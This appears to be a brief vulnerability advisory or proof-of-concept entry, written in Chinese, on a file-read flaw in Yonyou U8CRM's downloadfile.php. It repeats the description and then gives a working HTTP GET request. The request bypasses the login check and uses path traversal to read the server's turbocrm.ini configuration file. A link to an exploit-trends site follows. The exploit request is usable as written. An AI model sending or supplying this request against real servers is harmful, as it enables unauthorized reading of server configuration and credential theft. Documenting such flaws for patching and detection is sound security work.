Description
用友U8CRM downloadfile.php存在文件读取漏洞,攻击者可利用此漏洞获取服务器敏感信息
用友U8CRM downloadfile.php存在文件读取漏洞,攻击者可利用此漏洞获取服务器敏感信息
GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.